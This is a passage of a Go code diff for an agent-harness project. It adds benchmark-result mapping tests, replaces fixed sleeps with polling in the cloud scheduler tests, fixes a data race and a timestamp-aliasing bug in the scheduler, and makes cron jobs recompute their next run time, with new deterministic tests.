+		t.Errorf("CostStatus: got %q, want %q", result.CostStatus, summary.CostStatus)
+	}
+	if result.CacheHitRate != summary.CacheHitRate {
+		t.Errorf("CacheHitRate: got %v, want %v", result.CacheHitRate, summary.CacheHitRate)
+	}
+	if result.ErrorMessage != summary.Error {
+		t.Errorf("ErrorMessage: got %q, want %q", result.ErrorMessage, summary.Error)
+	}
+}
+
+// TestFromRun_MapsRunFields asserts that Run fields (model, provider, prompt,
+// output, tenant/conversation/agent IDs, created_at, updated_at) appear in the result.
+func TestFromRun_MapsRunFields(t *testing.T) {
+	summary, run := makeTestPair()
+	result := benchresult.FromRun(summary, run)
+
+	if result.Model != run.Model {
+		t.Errorf("Model: got %q, want %q", result.Model, run.Model)
+	}
+	if result.ProviderName != run.ProviderName {
+		t.Errorf("ProviderName: got %q, want %q", result.ProviderName, run.ProviderName)
+	}
+	if result.Prompt != run.Prompt {
+		t.Errorf("Prompt: got %q, want %q", result.Prompt, run.Prompt)
+	}
+	if result.Output != run.Output {
+		t.Errorf("Output: got %q, want %q", result.Output, run.Output)
+	}
+	if result.TenantID != run.TenantID {
+		t.Errorf("TenantID: got %q, want %q", result.TenantID, run.TenantID)
+	}
+	if result.ConversationID != run.ConversationID {
+		t.Errorf("ConversationID: got %q, want %q", result.ConversationID, run.ConversationID)
+	}
+	if result.AgentID != run.AgentID {
+		t.Errorf("AgentID: got %q, want %q", result.AgentID, run.AgentID)
+	}
+	if !result.CreatedAt.Equal(run.CreatedAt) {
+		t.Errorf("CreatedAt: got %v, want %v", result.CreatedAt, run.CreatedAt)
+	}
+	if !result.UpdatedAt.Equal(run.UpdatedAt) {
+		t.Errorf("UpdatedAt: got %v, want %v", result.UpdatedAt, run.UpdatedAt)
+	}
+}
+
+// TestFromRun_DerivedDuration asserts that DurationMs is DERIVED from
+// updated_at - created_at (not a raw API field).
+func TestFromRun_DerivedDuration(t *testing.T) {
+	summary, run := makeTestPair()
+	result := benchresult.FromRun(summary, run)
+
+	wantMs := run.UpdatedAt.Sub(run.CreatedAt).Milliseconds()
+	if result.DurationMs != wantMs {
+		t.Errorf("DurationMs (derived): got %d, want %d", result.DurationMs, wantMs)
+	}
+}
+
+// TestFromRun_ToolCallRecords asserts that each ToolCallSummary maps into a
+// ToolCallRecord with ToolName and Step preserved exactly.
+func TestFromRun_ToolCallRecords(t *testing.T) {
+	summary, run := makeTestPair()
+	result := benchresult.FromRun(summary, run)
+
+	if len(result.ToolCallRecords) != len(summary.ToolCalls) {
+		t.Fatalf("ToolCallRecords length: got %d, want %d", len(result.ToolCallRecords), len(summary.ToolCalls))
+	}
+	for i, tc := range summary.ToolCalls {
+		got := result.ToolCallRecords[i]
+		if got.ToolName != tc.ToolName {
+			t.Errorf("ToolCallRecords[%d].ToolName: got %q, want %q", i, got.ToolName, tc.ToolName)
+		}
+		if got.Step != tc.Step {
+			t.Errorf("ToolCallRecords[%d].Step: got %d, want %d", i, got.Step, tc.Step)
+		}
+	}
+}
+
+// TestReconstructRolloutPath_WithDir asserts that a non-empty rolloutDir yields
+// a path containing the UTC date of created_at and the run ID.
+func TestReconstructRolloutPath_WithDir(t *testing.T) {
+	_, run := makeTestPair()
+	path := benchresult.ReconstructRolloutPath("/data/rollouts", run)
+
+	// Expect the date subfolder in YYYY-MM-DD format based on run.CreatedAt UTC.
+	wantDate := run.CreatedAt.UTC().Format("2006-01-02")
+	wantSuffix := run.ID + ".jsonl"
+
+	if path == "" {
+		t.Fatal("expected non-empty rollout path when rolloutDir is given")
+	}
+	if !containsSubstr(path, wantDate) {
+		t.Errorf("rollout path %q does not contain date %q", path, wantDate)
+	}
+	if !containsSubstr(path, wantSuffix) {
+		t.Errorf("rollout path %q does not end with %q", path, wantSuffix)
+	}
+}
+
+// TestReconstructRolloutPath_EmptyDir asserts that an empty rolloutDir returns
+// an empty string (never guess).
+func TestReconstructRolloutPath_EmptyDir(t *testing.T) {
+	_, run := makeTestPair()
+	path := benchresult.ReconstructRolloutPath("", run)
+	if path != "" {
+		t.Errorf("expected empty rollout path when rolloutDir is empty, got %q", path)
+	}
+}
+
+// TestFromRun_RolloutPathEmpty asserts that FromRun with no rolloutDir leaves
+// RolloutPath empty.
+func TestFromRun_RolloutPathEmpty(t *testing.T) {
+	summary, run := makeTestPair()
+	result := benchresult.FromRun(summary, run)
+	// FromRun does not have access to rolloutDir — path must be empty.
+	if result.RolloutPath != "" {
+		t.Errorf("RolloutPath: expected empty from FromRun, got %q", result.RolloutPath)
+	}
+}
+
+// TestFromRun_DriftFieldsAbsent asserts that the optional EXTERNAL drift
+// fields are zero/nil by default (FromRun never fills them).
+func TestFromRun_DriftFieldsAbsent(t *testing.T) {
+	summary, run := makeTestPair()
+	result := benchresult.FromRun(summary, run)
+	if result.Drift != nil {
+		t.Errorf("Drift: expected nil (external/opt-in), got %+v", result.Drift)
+	}
+	if len(result.ForensicEvents) != 0 {
+		t.Errorf("ForensicEvents: expected empty (external/opt-in), got %d entries", len(result.ForensicEvents))
+	}
+}
+
+// TestJSONRoundTrip asserts that a BenchmarkResult survives a
+// marshal/unmarshal cycle with all non-zero fields preserved.
+func TestJSONRoundTrip(t *testing.T) {
+	summary, run := makeTestPair()
+	result := benchresult.FromRun(summary, run)
+
+	data, err := json.Marshal(result)
+	if err != nil {
+		t.Fatalf("json.Marshal: %v", err)
+	}
+
+	var decoded benchresult.BenchmarkResult
+	if err := json.Unmarshal(data, &decoded); err != nil {
+		t.Fatalf("json.Unmarshal: %v", err)
+	}
+
+	if decoded.RunID != result.RunID {
+		t.Errorf("round-trip RunID: got %q, want %q", decoded.RunID, result.RunID)
+	}
+	if decoded.DurationMs != result.DurationMs {
+		t.Errorf("round-trip DurationMs: got %d, want %d", decoded.DurationMs, result.DurationMs)
+	}
+	if decoded.TotalCostUSD != result.TotalCostUSD {
+		t.Errorf("round-trip TotalCostUSD: got %v, want %v", decoded.TotalCostUSD, result.TotalCostUSD)
+	}
+	if len(decoded.ToolCallRecords) != len(result.ToolCallRecords) {
+		t.Errorf("round-trip ToolCallRecords len: got %d, want %d",
+			len(decoded.ToolCallRecords), len(result.ToolCallRecords))
+	}
+	if !decoded.CreatedAt.Equal(result.CreatedAt) {
+		t.Errorf("round-trip CreatedAt: got %v, want %v", decoded.CreatedAt, result.CreatedAt)
+	}
+}
+
+// containsSubstr is a simple helper avoiding import of strings in test file.
+func containsSubstr(s, sub string) bool {
+	return len(s) >= len(sub) && findSubstr(s, sub)
+}
+
+func findSubstr(s, sub string) bool {
+	for i := 0; i <= len(s)-len(sub); i++ {
+		if s[i:i+len(sub)] == sub {
+			return true
+		}
+	}
+	return false
+}

--- a/internal/cloudscheduler/cloudscheduler_test.go
+++ b/internal/cloudscheduler/cloudscheduler_test.go
@@ -18,11 +18,11 @@ import (
 // =============================================================================
 
 type mockExecutor struct {
-	backend    string
-	executeFn  func(ctx context.Context, job cloudscheduler.Job) (string, error)
-	callCount  int
-	mu         sync.Mutex
-	delay      time.Duration
+	backend   string
+	executeFn func(ctx context.Context, job cloudscheduler.Job) (string, error)
+	callCount int
+	mu        sync.Mutex
+	delay     time.Duration
 }
 
 func (m *mockExecutor) Backend() string { return m.backend }
@@ -56,10 +56,12 @@ func TestCloudPOC1_SubmitAndComplete(t *testing.T) {
 	sched.RegisterExecutor(newMockExecutor("docker"))
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
-	sched.Start(ctx)
-	defer sched.Stop()
 
-	// Submit a job
+	// Submit BEFORE Start so the submit-time status is deterministically observable.
+	// If we Start() first, the worker can complete the (instant) mock job before this
+	// assertion runs, racing the transient "queued" state. Submit enqueues into the
+	// buffered channel and the deferred Start() drains it. (Submit now also returns a
+	// by-value snapshot, so job.Status is a stable submit-time view regardless.)
 	job, err := sched.Submit(cloudscheduler.Job{
 		WorkflowName: "test-workflow",
 		Args:         map[string]any{"target": "production"},
@@ -68,8 +70,11 @@ func TestCloudPOC1_SubmitAndComplete(t *testing.T) {
 	require.NoError(t, err)
 	assert.Equal(t, cloudscheduler.JobStatusQueued, job.Status)
 
-	// Wait for completion
-	deadline := time.Now().Add(5 * time.Second)
+	sched.Start(ctx)
+	defer sched.Stop()
+
+	// Wait for completion. Generous deadline to survive heavy parallel load.
+	deadline := time.Now().Add(30 * time.Second)
 	for time.Now().Before(deadline) {
 		j, _ := sched.GetJob(job.ID)
 		if j.Status == cloudscheduler.JobStatusCompleted || j.Status == cloudscheduler.JobStatusFailed {
@@ -115,10 +120,16 @@ func TestCloudPOC2_MultipleBackends(t *testing.T) {
 		jobIDs = append(jobIDs, job.ID)
 	}
 
-	// Wait for all to complete
-	time.Sleep(3 * time.Second)
-
+	// Wait for all to complete via polling (fixed sleeps race a saturated machine).
+	deadline := time.Now().Add(30 * time.Second)
 	for _, id := range jobIDs {
+		for time.Now().Before(deadline) {
+			job, err := sched.GetJob(id)
+			if err == nil && (job.Status == cloudscheduler.JobStatusCompleted || job.Status == cloudscheduler.JobStatusFailed) {
+				break
+			}
+			time.Sleep(50 * time.Millisecond)
+		}
 		job, err := sched.GetJob(id)
 		require.NoError(t, err)
 		assert.Equal(t, cloudscheduler.JobStatusCompleted, job.Status)
@@ -145,7 +156,10 @@ func TestCloudPOC3_ScheduledExecution(t *testing.T) {
 	sched.Start(ctx)
 	defer sched.Stop()
 
-	future := time.Now().Add(500 * time.Millisecond)
+	// Use a generous schedule delay so the "still queued" check below is robust
+	// even if this goroutine is starved under heavy parallel load: the job is not
+	// enqueued until the delay elapses, so it stays queued until then.
+	future := time.Now().Add(2 * time.Second)
 	job, err := sched.Submit(cloudscheduler.Job{
 		WorkflowName: "scheduled-workflow",
 		Backend:      "docker",
@@ -153,12 +167,21 @@ func TestCloudPOC3_ScheduledExecution(t *testing.T) {
 	})
 	require.NoError(t, err)
 
-	// Immediately, it should still be queued
+	// Immediately, it should still be queued (the delayed enqueue has not fired).
 	j, _ := sched.GetJob(job.ID)
 	assert.Equal(t, cloudscheduler.JobStatusQueued, j.Status)
 
-	// After the schedule time, it should complete
-	time.Sleep(time.Second)
+	// After the schedule time it should complete; poll with a generous deadline
+	// instead of a fixed sleep so the terminal assertion does not race a slow,
+	// saturated scheduler.
+	deadline := time.Now().Add(30 * time.Second)
+	for time.Now().Before(deadline) {
+		j, _ = sched.GetJob(job.ID)
+		if j.Status == cloudscheduler.JobStatusCompleted || j.Status == cloudscheduler.JobStatusFailed {
+			break
+		}
+		time.Sleep(50 * time.Millisecond)
+	}
 
 	j, err = sched.GetJob(job.ID)
 	require.NoError(t, err)
@@ -192,8 +215,9 @@ func TestCloudPOC4_EventStreaming(t *testing.T) {
 	allEvents := make([]cloudscheduler.Event, 0, len(history))
 	allEvents = append(allEvents, history...)
 
-	// Collect live events
-	timeout := time.After(3 * time.Second)
+	// Collect live events. Generous timeout so a saturated scheduler still
+	// delivers the terminal event before we give up (early-exit on terminal).
+	timeout := time.After(30 * time.Second)
 loop:
 	for {
 		select {
@@ -252,7 +276,7 @@ func TestCloudPOC5_ConcurrentJobs(t *testing.T) {
 	wg.Wait()
 
 	// Wait for all to complete with polling
-	deadline := time.Now().Add(10 * time.Second)
+	deadline := time.Now().Add(30 * time.Second)
 	for _, id := range jobIDs {
 		for time.Now().Before(deadline) {
 			job, err := sched.GetJob(id)
@@ -339,8 +363,19 @@ func TestCloudPOC7_RetryOnFailure(t *testing.T) {
 		},
 	})
 
-	// Wait for retries to complete
-	time.Sleep(2 * time.Second)
+	// Wait for retries to complete. Poll specifically for Completed — NOT Failed —
+	// because executeJob transiently sets the status to Failed during each retry
+	// backoff window before retryJob re-queues the job. Breaking on Failed would
+	// race that transient window under load. This mock succeeds on the 3rd attempt,
+	// so Completed is the stable terminal outcome; the deadline bounds a real hang.
+	deadline := time.Now().Add(30 * time.Second)
+	for time.Now().Before(deadline) {
+		j, _ := sched.GetJob(job.ID)
+		if j.Status == cloudscheduler.JobStatusCompleted {
+			break
+		}
+		time.Sleep(50 * time.Millisecond)
+	}
 
 	final, err := sched.GetJob(job.ID)
 	require.NoError(t, err)
@@ -368,7 +403,15 @@ func TestCloudPOC8_ListAndFilter(t *testing.T) {
 		})
 	}
 
-	time.Sleep(2 * time.Second)
+	// Poll until all 5 jobs reach Completed instead of a fixed sleep, so the
+	// terminal-state assertions below do not race a slow scheduler under load.
+	deadline := time.Now().Add(30 * time.Second)
+	for time.Now().Before(deadline) {
+		if len(sched.ListJobs(cloudscheduler.JobStatusCompleted)) == 5 {
+			break
+		}
+		time.Sleep(50 * time.Millisecond)
+	}
 
 	// List all
 	all := sched.ListJobs("")
@@ -378,7 +421,7 @@ func TestCloudPOC8_ListAndFilter(t *testing.T) {
 	completed := sched.ListJobs(cloudscheduler.JobStatusCompleted)
 	assert.Len(t, completed, 5, "all 5 jobs should complete")
 
-	// List queued (should be empty now)
+	// List queued (should be empty now — all jobs have reached a terminal state)
 	queued := sched.ListJobs(cloudscheduler.JobStatusQueued)
 	assert.Len(t, queued, 0)
 }
@@ -443,22 +486,25 @@ func TestCloudPOC10_FullCloudLifecycle(t *testing.T) {
 		jobIDs = append(jobIDs, created.ID)
 	}
 
-	// Wait for all to complete with polling
-	deadline := time.Now().Add(10 * time.Second)
+	// Wait for all to complete with polling. This test submits exactly 3 jobs
+	// (the wait condition previously checked for 5 — a copy/paste bug that made
+	// the early-exit dead code, so the loop always burned the full deadline).
+	const wantJobs = 3
+	deadline := time.Now().Add(30 * time.Second)
 	for time.Now().Before(deadline) {
 		all := sched.ListJobs("")
-		if len(all) >= 5 {
+		if len(all) >= wantJobs {
 			completed := 0
 			for _, j := range all {
 				if j.Status == cloudscheduler.JobStatusCompleted {
 					completed++
 				}
 			}
-			if completed == 5 {
+			if completed == wantJobs {
 				break
 			}
 		}
-		time.Sleep(200 * time.Millisecond)
+		time.Sleep(50 * time.Millisecond)
 	}
 
 	// Verify all completed

--- a/internal/cloudscheduler/docker_integration_test.go
+++ b/internal/cloudscheduler/docker_integration_test.go
@@ -3,6 +3,7 @@ package cloudscheduler_test
 import (
 	"context"
 	"fmt"
+	osexec "os/exec"
 	"strings"
 	"sync"
 	"testing"
@@ -14,11 +15,41 @@ import (
 	"go-agent-harness/internal/cloudscheduler"
 )
 
+var (
+	dockerProbeOnce  sync.Once
+	dockerSkipReason string
+)
+
+// requireDocker skips the calling test unless a usable Docker daemon is reachable.
+// The TestDockerDeep_* tests exercise real alpine containers; without this gate they
+// silently fall through to the executor's simulation path (giving false confidence)
+// or fail on container-specific assertions. With the gate they run for real in CI
+// (where Docker is present) and skip cleanly in environments without a daemon. The
+// probe is memoized so it runs at most once per package test binary.
+func requireDocker(t *testing.T) {
+	t.Helper()
+	dockerProbeOnce.Do(func() {
+		if _, err := osexec.LookPath("docker"); err != nil {
+			dockerSkipReason = "docker CLI not found"
+			return
+		}
+		ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+		defer cancel()
+		if out, err := osexec.CommandContext(ctx, "docker", "info").CombinedOutput(); err != nil {
+			dockerSkipReason = fmt.Sprintf("docker daemon not available: %v: %s", err, strings.TrimSpace(string(out)))
+		}
+	})
+	if dockerSkipReason != "" {
+		t.Skipf("skipping real-container integration test: %s", dockerSkipReason)
+	}
+}
+
 // =============================================================================
 // Deep Integration POCs with real Docker containers
 // =============================================================================
 
 func TestDockerDeep_01_RealContainerExecution(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(2)
 	exec := cloudscheduler.NewDockerExecutor()
 	exec.Image = "alpine:latest"
@@ -73,6 +104,7 @@ func TestDockerDeep_01_RealContainerExecution(t *testing.T) {
 // =============================================================================
 
 func TestDockerDeep_02_ContainerIsolation(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(1)
 	exec := cloudscheduler.NewDockerExecutor()
 	exec.Image = "alpine:latest"
@@ -124,6 +156,7 @@ func TestDockerDeep_02_ContainerIsolation(t *testing.T) {
 // =============================================================================
 
 func TestDockerDeep_03_ConcurrentContainers(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(3)
 	exec := cloudscheduler.NewDockerExecutor()
 	exec.Image = "alpine:latest"
@@ -177,6 +210,7 @@ func TestDockerDeep_03_ConcurrentContainers(t *testing.T) {
 // =============================================================================
 
 func TestDockerDeep_04_ScheduledDockerExecution(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(2)
 	exec := cloudscheduler.NewDockerExecutor()
 	exec.Image = "alpine:latest"
@@ -187,11 +221,15 @@ func TestDockerDeep_04_ScheduledDockerExecution(t *testing.T) {
 	sched.Start(ctx)
 	defer sched.Stop()
 
-	// Schedule 3 jobs at different times
+	// Schedule 3 jobs at different times. Use generous, well-separated delays so
+	// that (a) the "job1 still queued immediately after submit" check below is
+	// robust even if this goroutine is briefly starved under heavy parallel load
+	// (the delayed enqueue has not fired yet), and (b) the relative start-ordering
+	// holds with a comfortable margin between containers.
 	now := time.Now()
-	schedule1 := now.Add(1 * time.Second)
-	schedule2 := now.Add(2 * time.Second)
-	schedule3 := now.Add(3 * time.Second)
+	schedule1 := now.Add(3 * time.Second)
+	schedule2 := now.Add(6 * time.Second)
+	schedule3 := now.Add(9 * time.Second)
 
 	job1, _ := sched.Submit(cloudscheduler.Job{
 		ID:           "scheduled-1",
@@ -245,6 +283,7 @@ func TestDockerDeep_04_ScheduledDockerExecution(t *testing.T) {
 // =============================================================================
 
 func TestDockerDeep_05_EventStreamingDocker(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(1)
 	exec := cloudscheduler.NewDockerExecutor()
 	exec.Image = "alpine:latest"
@@ -316,6 +355,7 @@ loop:
 // =============================================================================
 
 func TestDockerDeep_06_CancelDuringQueue(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(1)
 	exec := cloudscheduler.NewDockerExecutor()
 	exec.Image = "alpine:latest"
@@ -336,14 +376,30 @@ func TestDockerDeep_06_CancelDuringQueue(t *testing.T) {
 		jobIDs = append(jobIDs, job.ID)
 	}
 
-	// Cancel the last 5 (should still be in queue)
+	// Cancel the last 5 (should still be in queue). With a single worker, jobs
+	// 5-9 cannot have started yet, so cancelling them is deterministic.
 	for i := 5; i < 10; i++ {
 		err := sched.Cancel(jobIDs[i])
 		require.NoError(t, err)
 	}
 
-	// Wait for all to settle
-	time.Sleep(5 * time.Second)
+	// Wait for the first 5 to reach a terminal state via polling instead of a
+	// fixed sleep — real Docker containers are slow and can exceed a fixed budget
+	// under heavy parallel load.
+	deadline := time.Now().Add(120 * time.Second)
+	for time.Now().Before(deadline) {
+		settled := 0
+		for i := 0; i < 5; i++ {
+			job, _ := sched.GetJob(jobIDs[i])
+			if job.Status == cloudscheduler.JobStatusCompleted || job.Status == cloudscheduler.JobStatusFailed {
+				settled++
+			}
+		}
+		if settled == 5 {
+			break
+		}
+		time.Sleep(500 * time.Millisecond)
+	}
 
 	// First 5 should be completed, last 5 cancelled
 	for i := 0; i < 5; i++ {
@@ -361,6 +417,7 @@ func TestDockerDeep_06_CancelDuringQueue(t *testing.T) {
 // =============================================================================
 
 func TestDockerDeep_07_MultiBackendSimultaneous(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(4)
 
 	// Register multiple executors
@@ -452,11 +509,19 @@ func TestDockerDeep_08_RetryWithBackoff(t *testing.T) {
 		},
 	})
 
-	// Wait for completion (retries add time)
+	// Wait for completion (retries add time). Wait specifically for Completed —
+	// NOT Failed — because executeJob transiently sets a job's status to Failed
+	// for the duration of the retry backoff before retryJob re-queues it (the
+	// failure path sets JobStatusFailed, then spawns the delayed retry). Breaking
+	// on Failed therefore races that transient window: under load the loop can
+	// exit while a retry is still pending (status flickers Failed -> queued),
+	// observing callCount=2 instead of the eventual 3. This mock always succeeds
+	// on the 3rd attempt, so Completed is the stable terminal outcome; the 30s
+	// deadline bounds a genuine hang.
 	deadline := time.Now().Add(30 * time.Second)
 	for time.Now().Before(deadline) {
 		j, _ := sched.GetJob(job.ID)
-		if j.Status == cloudscheduler.JobStatusCompleted || j.Status == cloudscheduler.JobStatusFailed {
+		if j.Status == cloudscheduler.JobStatusCompleted {
 			break
 		}
 		time.Sleep(500 * time.Millisecond)
@@ -473,6 +538,7 @@ func TestDockerDeep_08_RetryWithBackoff(t *testing.T) {
 // =============================================================================
 
 func TestDockerDeep_09_QueueBacklog(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(2)
 	exec := cloudscheduler.NewDockerExecutor()
 	exec.Image = "alpine:latest"
@@ -525,6 +591,7 @@ func TestDockerDeep_09_QueueBacklog(t *testing.T) {
 // =============================================================================
 
 func TestDockerDeep_10_StressTest(t *testing.T) {
+	requireDocker(t)
 	sched := cloudscheduler.New(4)
 	exec := cloudscheduler.NewDockerExecutor()
 	exec.Image = "alpine:latest"
@@ -567,8 +634,16 @@ func TestDockerDeep_10_StressTest(t *testing.T) {
 
 	wg.Wait()
 
-	// Wait for all to complete
-	time.Sleep(30 * time.Second)
+	// Wait for all 30 to complete via polling rather than a fixed sleep: 30 real
+	// Docker containers across 4 workers can easily exceed a fixed budget when the
+	// whole test suite is saturating the machine. Early-exit once all complete.
+	deadline := time.Now().Add(120 * time.Second)
+	for time.Now().Before(deadline) {
+		if len(sched.ListJobs(cloudscheduler.JobStatusCompleted)) == 30 {
+			break
+		}
+		time.Sleep(time.Second)
+	}
 
 	allJobs := sched.ListJobs("")
 	t.Logf("Total jobs after stress test: %d", len(allJobs))

--- a/internal/cloudscheduler/scheduler.go
+++ b/internal/cloudscheduler/scheduler.go
@@ -151,8 +151,15 @@ func (s *Scheduler) Submit(job Job) (*Job, error) {
 	job.CreatedAt = time.Now().UTC()
 
 	s.mu.Lock()
-	cp := job
-	s.jobs[job.ID] = &cp
+	stored := job
+	s.jobs[job.ID] = &stored
+	// Take a snapshot to return to the caller. We must NOT hand back the same
+	// *Job we stored in s.jobs: worker goroutines mutate that pointer (Status,
+	// StartedAt, Result, ...) concurrently, so returning it would expose a
+	// shared mutable reference and a genuine data race (observable under -race)
+	// to callers that read fields after Start(). Returning a by-value snapshot
+	// mirrors GetJob and gives a stable submit-time view (Status == queued).
+	snapshot := job
 	s.mu.Unlock()
 
 	s.emit(job.ID, "queued", map[string]any{"workflow": job.WorkflowName})
@@ -169,7 +176,7 @@ func (s *Scheduler) Submit(job Job) (*Job, error) {
 		s.queue <- job.ID
 	}
 
-	return &cp, nil
+	return &snapshot, nil
 }
 
 // GetJob returns the current state of a job.
@@ -283,14 +290,17 @@ func (s *Scheduler) executeJob(ctx context.Context, jobID string) {
 	s.emit(jobID, "started", map[string]any{"backend": job.Backend})
 
 	result, err := exec.Execute(ctx, *job)
-	now = time.Now().UTC()
+	// Use a distinct variable for the completion timestamp. Reassigning `now`
+	// would mutate the same memory that job.StartedAt points to (it was set to
+	// &now above), aliasing StartedAt to the completion time and corrupting it.
+	completedAt := time.Now().UTC()
 
 	s.mu.Lock()
 	if j, ok := s.jobs[jobID]; ok {
 		if err != nil {
 			j.Status = JobStatusFailed
 			j.Error = err.Error()
-			j.CompletedAt = &now
+			j.CompletedAt = &completedAt
 			s.mu.Unlock()
 			s.emit(jobID, "failed", map[string]any{"error": err.Error()})
 			// Retry logic
@@ -301,7 +311,7 @@ func (s *Scheduler) executeJob(ctx context.Context, jobID string) {
 		}
 		j.Status = JobStatusCompleted
 		j.Result = result
-		j.CompletedAt = &now
+		j.CompletedAt = &completedAt
 		s.mu.Unlock()
 		s.emit(jobID, "completed", map[string]any{"result": result})
 		return

--- a/internal/cron/scheduler.go
+++ b/internal/cron/scheduler.go
@@ -201,9 +201,13 @@ func (s *Scheduler) fireJob(job Job) {
 			log.Printf("cron: failed to update execution %s: %v", exec.ID, updateErr)
 		}
 
-		// Update job's last_run_at.
+		// Update job's last_run_at and recompute NextRunAt.
 		job.LastRunAt = endTime
 		job.UpdatedAt = endTime
+		if next, parseErr := NextRunTime(job.Schedule, endTime); parseErr == nil {
+			job.NextRunAt = next
+		}
+		// On schedule parse error, NextRunAt is left unchanged.
 		if updateErr := s.store.UpdateJob(ctx, job); updateErr != nil {
 			log.Printf("cron: failed to update job %s last_run_at: %v", job.ID, updateErr)
 		}

--- a/internal/cron/scheduler_test.go
+++ b/internal/cron/scheduler_test.go
@@ -673,3 +673,74 @@ func TestJitter_SameJobSameSchedule_SameJitter(t *testing.T) {
 		t.Fatalf("same inputs should produce same jitter: %v vs %v", j1, j2)
 	}
 }
+
+// TestFireJobAdvancesNextRunAt (T1) — fireJob must recompute NextRunAt after execution.
+// Before P1, fireJob never sets NextRunAt, so the stored job keeps the stale original value.
+func TestFireJobAdvancesNextRunAt(t *testing.T) {
+	var updatedJob Job
+	var mu sync.Mutex
+
+	store := &mockStore{
+		CreateExecutionFunc: func(ctx context.Context, exec Execution) (Execution, error) {
+			return exec, nil
+		},
+		UpdateExecutionFunc: func(ctx context.Context, exec Execution) error {
+			return nil
+		},
+		UpdateJobFunc: func(ctx context.Context, job Job) error {
+			mu.Lock()
+			updatedJob = job
+			mu.Unlock()
+			return nil
+		},
+	}
+
+	executor := &mockExecutor{
+		ExecuteFunc: func(ctx context.Context, job Job) (string, error) {
+			return "ok", nil
+		},
+	}
+
+	// Use a fixed clock so endTime is deterministic.
+	fireTime := time.Date(2025, 6, 1, 12, 0, 0, 0, time.UTC)
+	clock := newMockClock(fireTime)
+
+	// Disable jitter so sleepFn is not called and no extra complexity.
+	cfg := SchedulerConfig{
+		MaxConcurrent: 1,
+		Jitter:        JitterConfig{Enabled: false},
+	}
+	s := NewScheduler(store, executor, clock, cfg)
+	s.sleepFn = func(d time.Duration) {} // no-op
+
+	job := testJob("advance-next-run-at")
+	job.Schedule = "*/5 * * * *"
+	// Set an obviously stale NextRunAt so we can detect if it is unchanged.
+	job.NextRunAt = time.Date(2025, 1, 1, 0, 0, 0, 0, time.UTC)
+
+	// Pre-populate the jitter cache so fireJob does not panic on a missing key.
+	s.mu.Lock()
+	s.jitterCache[jitterCacheKey(job.ID, job.Schedule)] = 0
+	s.mu.Unlock()
+
+	s.fireJob(job)
+	s.wg.Wait()
+
+	mu.Lock()
+	got := updatedJob
+	mu.Unlock()
+
+	// Compute the expected NextRunAt: first occurrence of "*/5 * * * *" after fireTime.
+	want, err := NextRunTime(job.Schedule, fireTime)
+	if err != nil {
+		t.Fatalf("NextRunTime: %v", err)
+	}
+
+	if got.NextRunAt.IsZero() {
+		t.Fatal("NextRunAt was not set on updated job")
+	}
+	if !got.NextRunAt.Equal(want) {
+		t.Fatalf("NextRunAt = %v, want %v (schedule %q, fire time %v)",
+			got.NextRunAt, want, job.Schedule, fireTime)
+	}
+}

--- a/internal/cron/t2_deterministic_test.go
+++ b/internal/cron/t2_deterministic_test.go
@@ -1,0 +1,469 @@
+package cron
+
+// T2: deterministic cron behavior tests.
+//
+// (a) NextRunTime arithmetic — pure function, no I/O, no sleeps, fully
+//     deterministic for a fixed input time and schedule string.
+// (b) fireJob-driven execution — N sequential fireJob calls record the
+//     expected number of executions and advance LastRunAt/NextRunAt each
+//     time. No real sleeps; no reliance on the tick loop.
+
+import (
+	"context"
+	"sync"
+	"testing"
+	"time"
+)
+
+// ---------------------------------------------------------------------------
+// (a) NextRunTime arithmetic
+// ---------------------------------------------------------------------------
+
+func TestNextRunTime_TableDriven(t *testing.T) {
+	// All fixed reference times and expected values are computed by hand from
+	// standard cron semantics (5-field, robfig/cron v3 parser, UTC).
+	cases := []struct {
+		name     string
+		schedule string
+		from     time.Time
+		want     time.Time
+	}{
+		{
+			name:     "every-5-minutes_on_minute_boundary",
+			schedule: "*/5 * * * *",
+			from:     time.Date(2025, 1, 1, 0, 0, 0, 0, time.UTC),
+			want:     time.Date(2025, 1, 1, 0, 5, 0, 0, time.UTC),
+		},
+		{
+			name:     "every-5-minutes_mid-interval",
+			schedule: "*/5 * * * *",
+			from:     time.Date(2025, 1, 1, 0, 3, 30, 0, time.UTC),
+			want:     time.Date(2025, 1, 1, 0, 5, 0, 0, time.UTC),
+		},
+		{
+			name:     "every-5-minutes_just-after-slot",
+			schedule: "*/5 * * * *",
+			from:     time.Date(2025, 1, 1, 0, 5, 1, 0, time.UTC),
+			want:     time.Date(2025, 1, 1, 0, 10, 0, 0, time.UTC),
+		},
+		{
+			name:     "every-hour_on-the-hour",
+			schedule: "0 * * * *",
+			from:     time.Date(2025, 6, 15, 14, 0, 0, 0, time.UTC),
+			want:     time.Date(2025, 6, 15, 15, 0, 0, 0, time.UTC),
+		},
+		{
+			name:     "every-hour_mid-hour",
+			schedule: "0 * * * *",
+			from:     time.Date(2025, 6, 15, 14, 45, 0, 0, time.UTC),
+			want:     time.Date(2025, 6, 15, 15, 0, 0, 0, time.UTC),
+		},
+		{
+			name:     "daily-at-midnight",
+			schedule: "0 0 * * *",
+			from:     time.Date(2025, 3, 10, 12, 0, 0, 0, time.UTC),
+			want:     time.Date(2025, 3, 11, 0, 0, 0, 0, time.UTC),
+		},
+		{
+			name:     "daily-at-midnight_just-after-midnight",
+			schedule: "0 0 * * *",
+			from:     time.Date(2025, 3, 10, 0, 0, 1, 0, time.UTC),
+			want:     time.Date(2025, 3, 11, 0, 0, 0, 0, time.UTC),
+		},
+		{
+			name:     "monthly-first-of-month",
+			schedule: "0 0 1 * *",
+			from:     time.Date(2025, 1, 15, 0, 0, 0, 0, time.UTC),
+			want:     time.Date(2025, 2, 1, 0, 0, 0, 0, time.UTC),
+		},
+		{
+			name:     "monthly-first-of-month_on-the-day",
+			schedule: "0 0 1 * *",
+			from:     time.Date(2025, 2, 1, 0, 0, 1, 0, time.UTC),
+			want:     time.Date(2025, 3, 1, 0, 0, 0, 0, time.UTC),
+		},
+		{
+			name:     "every-10-minutes_wrap-hour",
